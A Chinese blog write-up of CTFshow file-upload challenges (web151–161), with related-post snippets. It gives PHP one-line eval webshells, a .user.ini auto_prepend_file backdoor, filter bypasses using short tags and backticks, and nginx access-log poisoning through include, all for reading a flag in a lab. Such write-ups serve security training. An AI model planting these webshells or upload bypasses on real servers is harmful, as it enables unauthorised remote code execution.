CTFshow-文件上传

已于 2023-02-22 22:54:39 修改
阅读量630 收藏
点赞数 2
文章标签: 安全 web安全
于 2023-01-22 22:53:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61376069/article/details/128744084
版权

ctfshow-web-151

这题就一个前端校验,直接在前端png改成php,上传木马,连蚁剑找flag

ctfshow-web-152

上传文件bp抓包,

`Content-Type`改成 image/png

再post:

muma=system("tac ../flag.php");

ctfshow-web-153

.user.ini留后门

进入/upload发现有东西,说明是有一个index.php,那么可以改配置文件.

配置文件上传
【文件上传漏洞】user.ini留后门

auto_prepend_file的用法:

auto_prepend_file可以让所有的php文件自动的包含某个文件。什么意思?

例如在.user.ini文件中写入

auto_prepend_file=a.jpg

然后在a.jpg中写入一个一句话代码

<?php eval($_P0ST['a']); ?>

那么和.user.ini和a.jpg同一目录下的所有php文件都会包含a.jpg文件。

抓包上传.user.iniauto_append_file=文件名

再上传1.txt,内容是一句话木马,

post:1=system("tac ../flag.php");

ctfshow-web-154、155

这题也是有index.php,和上题差不多,多过滤了php

可以用短标签替换,或者用大小写绕过

ctfshow-web-156

过滤了 [ ,可以用 { 代替

或者直接查看flag,

<?= system("tac ../flag*");?>

ctfshow-web-157、158

过滤了 ; { ,分号去掉也能执行,php 脚本的最后一个分号可以省略

ctfshow-web-159

过滤了括号,用反引号 ` 代替.

<?= `tac ../flag*`?>

日志包含

还可以用日志包含.

<?= include '/var/lo'.'g/nginx/access.lo'.'g'?>

这里过滤的log用 '.' 分开.

在日志上写上php脚本,不能直接打开flag.

<?php eval($_POST[a]);?>

然后再post:

a=system("tac ../flag.php");

ctfshow-web-160

比上一题多过滤了空格还有 ` ,不过还是能用 日志包含

<?=include'/var/lo'.'g/nginx/access.lo'.'g'?>

ctfshow-web-161

对于上一题,在每个文件前加上 GIF89a

ctfshow文件上传
weixin_53955759的博客
04-15 869
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow-文件上传web161-170
qq_52579508的博客
08-12 349
一开始发现不管输入什么都不行 ,添加了GIF头成功通过上传校验第二步上传 图片,包含了日志的文件 进行解析第三步访问 /upload 目录会解析 日志文件添加user-agent 头里面 添加一句话第四步 连接shell 获取flag。
ctfshow 文件上传
qq_52671379的博客
04-06 444
ctfshow 文件上传
CTFShow文件上传
paidx0
08-07 487
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
CTFSHOW 文件上传
qq_51754713的博客
02-27 436
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFshow-文件上传web151-160
qq_52579508的博客
08-12 550
提示前端校验不可靠抓包改 后缀webshell连接获取flag。
ctfshow-VIP题目-Web-详细解题思路
01-27
发现/editor目录,访问出现一个编辑器上传附件的地方,发现文件空间可以查看路径,发现一个nothinghere文件夹,比较可疑,里面找到fl000g.txt文件,访问/nothinghere/fl000g.txt,发现flag,flag:ctfshow{...}。...
CTFshow-文件上传(Web151-170)
最新发布
LH1013886337的博客
12-18 1251
htaccess被称为超文本入口,此文件有多个功能,其中一个功能可以。
CTFShow-WEB入门篇文件上传详细Wp(151-170)_ctfshow文件上传wp(1)
2401_84281698的博客
05-12 507
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
CTFSHOW 文件上传
m0_64180167的博客
11-14 423
直接上传 png的图片马然后抓包修改为php。
CTFSHOW-文件上传
Yb_140的博客
05-28 599
前端验证将这里改为php即可上传后缀为php一句话木马访问upload/1.php。
CTFshow_文件上传
qq_45927819的博客
11-29 3225
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之前的操作,但并没有上传成功:
[CTFSHOW]文件上传
Huamang的博客
03-28 338
web 151 看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码 web 152 和上题一样的解法 web 153 和上面一样的解法直接改后缀就没用了 测试了一下,发现是黑名单的过滤 所以就上传.htaccess文件把png文件解析成php 但是很遗憾,用不了 引用一波羽大佬的wp: 本题考点为.user.ini,详细配置可以参考官方文档 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和
ctfshow---文件上传
fainpo的博客
04-10 746
来到文件上传了。
ctfshow——文件上传
qq_55202378的博客
12-27 1732
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
CTFshow | 文件上传
m0_60651303的博客
08-04 894
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传。文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
CTFSHOW文件上传(可能也是持续更新)
Npceer-一位网安初学者的博客
02-14 310
文件上传0x01 web 151 0x01 web 151 按照hint去试了下 写一句话 然后改png 上传 抓包把后缀改成php 然后就上传成功了 然后 我太菜了 不会玩 还想用菜刀呢 然后报错了 没仔细看原因 接着访问url/upload/**.php(你自己写进去的文件名字) 我用的hackbar 从羽大佬博客学了一下 因为我自己用system+cat不知道为啥半天弄不出 ...
ctfshow-web-web红包题
07-14
如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值